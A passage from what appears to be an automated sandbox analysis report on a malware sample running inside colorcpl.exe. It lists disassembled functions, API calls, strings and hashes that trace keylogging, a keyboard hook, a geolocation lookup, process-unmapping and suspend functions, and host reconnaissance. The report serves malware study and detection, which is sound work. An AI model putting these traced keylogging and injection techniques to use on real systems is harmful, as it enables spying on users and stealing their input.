2fb5ba0 48950->48952 48950->48957 48966 2faec4c 21 API calls 48950->48966 48952->48949 48952->48957 48967 2fb0669 45 API calls 48952->48967 48955 2fb5c48 48955->48957 48968 2fc2f55 21 API calls _Yarn 48955->48968 48956->48957 48970 2fb4d96 21 API calls 2 library calls 48956->48970 48957->48936 48960->48937 48961->48937 48962->48934 48963->48934 48964->48935 48965->48944 48966->48952 48967->48955 48968->48949 48969->48956 48970->48957

                                                          Executed Functions

                                                          Function 02F9A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02F9A30E
                                                          • SetWindowsHookExA.USER32(0000000D,02F9A2DF,00000000), ref: 02F9A31C
                                                          • GetLastError.KERNEL32 ref: 02F9A328
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02F9A376
                                                          • TranslateMessage.USER32(?), ref: 02F9A385
                                                          • DispatchMessageA.USER32(?), ref: 02F9A390
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 02F9A33C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: 80535452c1b1b83e96053b015c31c6dc6ec5aac1282d2b6ce935975081bff277
                                                          • Instruction ID: 3f2b8f8b46199f7dff39a02ab420299279a95e3420f4e23e45629e9c2206ad79
                                                          • Opcode Fuzzy Hash: 80535452c1b1b83e96053b015c31c6dc6ec5aac1282d2b6ce935975081bff277
                                                          • Instruction Fuzzy Hash: 7011C172E50205AFAF117B759C09C6BB7ECEB85694B50092DFA82C2180EB71C504CBB2
                                                          Function 02F9A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,030050F0), ref: 02F9A451
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 02F9A45D
                                                          • GetKeyboardLayout.USER32(00000000), ref: 02F9A464
                                                          • GetKeyState.USER32(00000010), ref: 02F9A46E
                                                          • GetKeyboardState.USER32(?,?,030050F0), ref: 02F9A479
                                                          • ToUnicodeEx.USER32(03005144,?,?,?,00000010,00000000,00000000), ref: 02F9A49C
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02F9A4FC
                                                          • ToUnicodeEx.USER32(03005144,?,?,?,00000010,00000000,00000000), ref: 02F9A535
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID:
                                                          • API String ID: 1888522110-0
                                                          • Opcode ID: b3d92a55ab5e45a56f574ed9190910e7991d9c3925c272f580d17cb99800e5d7
                                                          • Instruction ID: 7a67dd8d569dab3199d1c82bcd7320cc76ebbbe5c3ee444f704dda61f25912a6
                                                          • Opcode Fuzzy Hash: b3d92a55ab5e45a56f574ed9190910e7991d9c3925c272f580d17cb99800e5d7
                                                          • Instruction Fuzzy Hash: F1316272644308BFEB11DB94DC44FDBB7EDEB88784F00082AB245D71A0D7B1A558CBA2
                                                          Function 02FAB411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02FAB438
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02FAB44E
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02FAB467
                                                          • InternetCloseHandle.WININET(00000000), ref: 02FAB4AD
                                                          • InternetCloseHandle.WININET(00000000), ref: 02FAB4B0
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 02FAB448
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: b96b77a9affc26fc54280e422ef28578bdef64657d97342e9b85e83a1967c399
                                                          • Instruction ID: fd91b77aff4867af3116bca220561e9ba0c617ab1d26b6f89eb91159ad3c1bec
                                                          • Opcode Fuzzy Hash: b96b77a9affc26fc54280e422ef28578bdef64657d97342e9b85e83a1967c399
                                                          • Instruction Fuzzy Hash: 3C11C4715053267BEB24EE25DD48EAF7F9DEF956E4F10082DFA0692140DB649808CAB2
                                                          Function 02F9F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 02FA3584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02FA35A4
                                                            • Part of subcall function 02FA3584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,030052F0), ref: 02FA35C2
                                                            • Part of subcall function 02FA3584: RegCloseKey.KERNEL32(?), ref: 02FA35CD
                                                          • Sleep.KERNEL32(00000BB8), ref: 02F9F896
                                                          • ExitProcess.KERNEL32 ref: 02F9F905
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.1.3 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-1392497409
                                                          • Opcode ID: 42f3042ca6aacf45b52cc8ae5d60ffd853769688ea78b4c41cd78b10cd299ee6
                                                          • Instruction ID: 67defdf147465d4647ea8697748658246b2b852f5c6bfa34d761ffc71f027992
                                                          • Opcode Fuzzy Hash: 42f3042ca6aacf45b52cc8ae5d60ffd853769688ea78b4c41cd78b10cd299ee6
                                                          • Instruction Fuzzy Hash: 4C21C771F1420567FE48B6788C65A2EB6AB5F81BD0F50052CF70A97294FE65C9018FA3
                                                          Function 02FC38C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,02FC3550,00000034,?,?,0074F630), ref: 02FC38DA
                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,02FC35E3,00000000,?,00000000), ref: 02FC38F0
                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,02FC35E3,00000000,?,00000000,02FAE2E2), ref: 02FC3902
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: cd2b381aa316762d20bfcb55bb7b36a558392bb2f94040eca43478c31e3f63dc
                                                          • Instruction ID: 23e4f0c5d6ca22e463d050499bf7d3db9bf3bb04c6d2ee4307c29dec08b0ec86
                                                          • Opcode Fuzzy Hash: cd2b381aa316762d20bfcb55bb7b36a558392bb2f94040eca43478c31e3f63dc
                                                          • Instruction Fuzzy Hash: E2E0923674C212FBEF310E21AD08F567A66EB85BE0F304D7DF315E80D8D6A28810C664
                                                          Function 02FAB69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,030050E4), ref: 02FAB6BB
                                                          • GetUserNameW.ADVAPI32(?,02F9F25E), ref: 02FAB6D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: 6a90a756b7d884b928642e2b3b8c1c917d53792d477e1b21d91857244cf03d8c
                                                          • Instruction ID: c22952a844d2b08e9698d8503f478699d8b6726bbc48c3c8f505cfb0dd83bd68
                                                          • Opcode Fuzzy Hash: 6a90a756b7d884b928642e2b3b8c1c917d53792d477e1b21d91857244cf03d8c
                                                          • Instruction Fuzzy Hash: CB014F7190011CABEF01EBD0DC44ADEB7BDAF04305F100166E605A2160EEB06A89CFA4
                                                          Function 02F9F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02FA5537,03004EE0,03005A00,03004EE0,00000000,03004EE0,00000000,03004EE0,5.1.3 Pro), ref: 02F9F920
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: ceac518a461cdd95eed946e53ccf2df37c2e4d71c881a05d82cb6a9bfb2de18d
                                                          • Instruction ID: 00609bfb0042c934ba1418916e0ac27216a166f0842078538f17561c817795dd
                                                          • Opcode Fuzzy Hash: ceac518a461cdd95eed946e53ccf2df37c2e4d71c881a05d82cb6a9bfb2de18d
                                                          • Instruction Fuzzy Hash: 1ED05B30B4411C77EA1096959C0AEAA779CD701B61F000195BF05D72C0D9E15E008BE1
                                                          Function 02FACBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACBF6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACBFF
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACC16
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC19
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC2B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC2E
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC3F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC42
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02F9EA1C), ref: 02FACC54
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC57
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02F9EA1C), ref: 02FACC63
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC66
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02F9EA1C), ref: 02FACC77
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC7A
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02F9EA1C), ref: 02FACC8B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC8E
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02F9EA1C), ref: 02FACC9F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCA2
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02F9EA1C), ref: 02FACCB3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCB6
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02F9EA1C), ref: 02FACCC7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCCA
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02F9EA1C), ref: 02FACCDB
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCDE
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02F9EA1C), ref: 02FACCEF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCF2
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02F9EA1C), ref: 02FACD03
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD06
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02F9EA1C), ref: 02FACD14
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD17
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02F9EA1C), ref: 02FACD28
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD2B
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02F9EA1C), ref: 02FACD38
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD3B
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02F9EA1C), ref: 02FACD48
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD4B
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02F9EA1C), ref: 02FACD5D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD60
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02F9EA1C), ref: 02FACD6D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD70
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02F9EA1C), ref: 02FACD81
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD84
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02F9EA1C), ref: 02FACD95
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD98
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02F9EA1C), ref: 02FACDAA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDAD
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02F9EA1C), ref: 02FACDBA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDBD
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02F9EA1C), ref: 02FACDCA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDCD
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02F9EA1C), ref: 02FACDDA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 4236061018-3687161714
                                                          • Opcode ID: 538e7d42190ad987349cd2223325f4eb952dc70728342b0297674e61e56d039e
                                                          • Instruction ID: 3212b1f93a01434237c7940f89c008cf9a09701cdcc30cc7af373b61d66c5580
                                                          • Opcode Fuzzy Hash: 538e7d42190ad987349cd2223325f4eb952dc70728342b0297674e61e56d039e
                                                          • Instruction Fuzzy Hash: 0441CAA1E8136C79FA90FBB75C4ED1F3F5CDD41AD87010817B316A7224DAB8D8048EA8
                                                          Function 02F9EA00 Relevance: 49.8, APIs: 15, Strings: 13, Instructions: 795COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 2f9ea00-2f9ea82 call 2facbe1 GetModuleFileNameW call 2f9f3fe call 2f920f6 * 2 call 2fabeac call 2f9fb52 call 2f91e8d call 2fcfd50 22 2f9eace-2f9eb96 call 2f91e65 call 2f91fab call 2f91e65 call 2f9531e call 2f96383 call 2f91fe2 call 2f91fd8 * 2 call 2f91e65 call 2f91fc0 call 2f95aa6 call 2f91e65 call 2f951e3 call 2f91e65 call 2f951e3 5->22 23 2f9ea84-2f9eac9 call 2f9fbee call 2f91e65 call 2f91fab call 2fa0f72 call 2f9fb9f call 2f9f3eb 5->23 69 2f9ebe9-2f9ec04 call 2f91e65 call 2f9b9f8 22->69 70 2f9eb98-2f9ebe3 call 2f96c59 call 2f91fe2 call 2f91fd8 call 2f91fab call 2fa3584 22->70 49 2f9ef2d-2f9ef3e call 2f91fd8 23->49 79 2f9ec3e-2f9ec45 call 2f9d0a4 69->79 80 2f9ec06-2f9ec25 call 2f91fab call 2fa3584 69->80 70->69 100 2f9f38a-2f9f3a5 call 2f91fab call 2fa39e4 call 2fa24b0 70->100 88 2f9ec4e-2f9ec55 79->88 89 2f9ec47-2f9ec49 79->89 80->79 99 2f9ec27-2f9ec3d call 2f91fab call 2fa39e4 80->99 93 2f9ec59-2f9ec65 call 2fab354 88->93 94 2f9ec57 88->94 92 2f9ef2c 89->92 92->49 104 2f9ec6e-2f9ec72 93->104 105 2f9ec67-2f9ec69 93->105 94->93 99->79 126 2f9f3aa-2f9f3db call 2fabcef call 2f91f04 call 2fa3a5e call 2f91f09 * 2 100->126 108 2f9ecb1-2f9ecc4 call 2f91e65 call 2f91fab 104->108 109 2f9ec74 call 2f97751 104->109 105->104 127 2f9eccb-2f9ed53 call 2f91e65 call 2fabcef call 2f91f13 call 2f91f09 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab 108->127 128 2f9ecc6 call 2f97790 108->128 117 2f9ec79-2f9ec7b 109->117 120 2f9ec7d-2f9ec82 call 2f97773 call 2f9729b 117->120 121 2f9ec87-2f9ec9a call 2f91e65 call 2f91fab 117->121 120->121 121->108 141 2f9ec9c-2f9eca2 121->141 156 2f9f3e0-2f9f3ea call 2f9dd7d call 2fa4f65 126->156 177 2f9edbb-2f9edbf 127->177 178 2f9ed55-2f9ed6e call 2f91e65 call 2f91fab call 2fcbb56 127->178 128->127 141->108 144 2f9eca4-2f9ecaa 141->144 144->108 147 2f9ecac call 2f9729b 144->147 147->108 179 2f9ef41-2f9efa1 call 2fc6f10 call 2f9247c call 2f91fab * 2 call 2fa3733 call 2f99092 177->179 180 2f9edc5-2f9edcc 177->180 178->177 203 2f9ed70-2f9edb6 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f9da6f call 2f91f13 call 2f91f09 178->203 234 2f9efa6-2f9effa call 2f91e65 call 2f91fab call 2f92093 call 2f91fab call 2fa37aa call 2f91e65 call 2f91fab call 2fcbb2c 179->234 183 2f9ee4a-2f9ee54 call 2f99092 180->183 184 2f9edce-2f9ee48 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f9ce34 180->184 193 2f9ee59-2f9ee7d call 2f9247c call 2fc4829 183->193 184->193 211 2f9ee8c 193->211 212 2f9ee7f-2f9ee8a call 2fc6f10 193->212 203->177 217 2f9ee8e-2f9eed9 call 2f91f04 call 2fcf859 call 2f9247c call 2f91fab call 2f9247c call 2f91fab call 2fa3982 211->217 212->217 272 2f9eede-2f9ef03 call 2fc4832 call 2f91e65 call 2f9b9f8 217->272 286 2f9effc 234->286 287 2f9f017-2f9f019 234->287 272->234 288 2f9ef09-2f9ef28 call 2f91e65 call 2fabcef call 2f9f4af 272->288 289 2f9effe-2f9f015 call 2face2c CreateThread 286->289 290 2f9f01b-2f9f01d 287->290 291 2f9f01f 287->291 288->234 306 2f9ef2a 288->306 294 2f9f025-2f9f101 call 2f92093 * 2 call 2fab580 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2fcbb2c call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab StrToIntA call 2f99e1f call 2f91e65 call 2f91fab 289->294 290->289 291->294 344 2f9f13c 294->344 345 2f9f103-2f9f13a call 2fc455e call 2f91e65 call 2f91fab CreateThread 294->345 306->92 346 2f9f13e-2f9f156 call 2f91e65 call 2f91fab 344->346 345->346 356 2f9f158-2f9f18f call 2fc455e call 2f91e65 call 2f91fab CreateThread 346->356 357 2f9f194-2f9f1a7 call 2f91e65 call 2f91fab 346->357 356->357 367 2f9f1a9-2f9f202 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f9da23 call 2f91f13 call 2f91f09 CreateThread 357->367 368 2f9f207-2f9f21a call 2f91e65 call 2f91fab 357->368 367->368 379 2f9f21c-2f9f250 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2fcbb2c call 2f9c19d 368->379 380 2f9f255-2f9f279 call 2fab69e call 2f91f13 call 2f91f09 368->380 379->380 400 2f9f27b-2f9f27c SetProcessDEPPolicy 380->400 401 2f9f27e-2f9f291 CreateThread 380->401 400->401 404 2f9f29f-2f9f2a6 401->404 405 2f9f293-2f9f29d CreateThread 401->405 409 2f9f2a8-2f9f2b2 CreateThread 404->409 410 2f9f2b4-2f9f2bb 404->410 405->404 409->410 413 2f9f2c9 410->413 414 2f9f2bd-2f9f2c0 410->414 418 2f9f2ce-2f9f302 call 2f92093 call 2f952fd call 2f92093 call 2fab580 call 2f91fd8 413->418 415 2f9f2c2-2f9f2c7 414->415 416 2f9f307-2f9f31a call 2f91fab call 2fa353a 414->416 415->418 425 2f9f31f-2f9f322 416->425 418->416 425->156 427 2f9f328-2f9f368 call 2fabcef call 2f91f04 call 2fa3656 call 2f91f09 call 2f91f04 425->427 443 2f9f381-2f9f386 DeleteFileW 427->443 444 2f9f388 443->444 445 2f9f36a-2f9f36d 443->445 444->126 445->126 446 2f9f36f-2f9f37c Sleep call 2f91f04 445->446 446->443
                                                          APIs
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACBF6
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACBFF
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACC16
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC19
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC2B
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC2E
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC3F
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC42
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02F9EA1C), ref: 02FACC54
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC57
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02F9EA1C), ref: 02FACC63
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC66
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02F9EA1C), ref: 02FACC77
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC7A
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02F9EA1C), ref: 02FACC8B
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC8E
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02F9EA1C), ref: 02FACC9F
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCA2
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02F9EA1C), ref: 02FACCB3
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCB6
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02F9EA1C), ref: 02FACCC7
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCCA
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02F9EA1C), ref: 02FACCDB
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCDE
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02F9EA1C), ref: 02FACCEF
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCF2
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02F9EA1C), ref: 02FACD03
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACD06
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02F9EA1C), ref: 02FACD14
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 02F9EA29
                                                            • Part of subcall function 02FA0F72: __EH_prolog.LIBCMT ref: 02FA0F77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
